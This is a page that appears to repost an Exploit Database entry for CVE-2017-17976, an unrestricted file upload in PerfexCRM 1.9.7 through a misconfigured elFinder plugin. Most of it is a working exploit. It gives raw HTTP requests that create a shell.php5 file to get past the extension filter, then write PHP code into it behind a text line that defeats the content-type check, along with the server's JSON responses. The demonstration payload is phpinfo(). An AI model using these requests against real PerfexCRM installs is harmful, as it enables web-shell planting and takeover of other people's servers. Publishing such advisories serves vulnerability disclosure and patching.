PerfexCRM 1.9.7 – Arbitrary File Upload

• Exploit Database
• 118 阅读

• 作者： Ahmad Mahfouz
  日期： 2018-01-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/43590/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63

  # Exploit Title: PerfexCRM 1.9.7 – Unrestricted php5 File upload # Exploit Author: Ahmad Mahfouz # Description: PerfexCRM 1.9.7 prone to unrestricted file upload that lead to system take over by misconfigured elfinder plugin # Contact: http://twitter.com/eln1x # Date: 12/01/2018 # CVE: CVE-2017-17976 # Version: v1.9.7 # Software Link: https://www.perfexcrm.com/     # bypassing the misconfigured file upload with file .php5     GET admin/utilities/elfinder_init?cmd=mkfile&name=shell.php5&target=[dir]     JSON Response:   {"added":[{"isowner":false,"mime":"text\/plain","read":1,"write":1,"size":"0","hash":"[XXX]","name":"shell.php5","phash":"[XXXX] "}],"changed":[{"isowner":false,"mime":"directory","read":1,"write":1,"size":0,"hash":"[ XXX]","name":"asa","phash":"[ XXX] ","volumeid":"[XXX]"}]}     #bypass the file content restriction by adding TEXT line to represent mime type text     Request     POST /admin/utilities/elfinder_init HTTP/1.1   Content-Type: application/x-www-form-urlencoded; charset=UTF-8   X-Requested-With: XMLHttpRequest   Connection: close     cmd=put&target=[folder]&encoding=UTF-8&content=demo     newline to represent text mime type   <?php   phpinfo();   ?>     HTTP/1.1 200 OK Content-Type: application/json Connection: close Content-Length: 167     {"changed":[{"isowner":false,"mime":"text\/plain","read":1,"write":1,"size":"44","hash":"[XXX]","name":"shell.php5","phash":"[XXX]]"}]}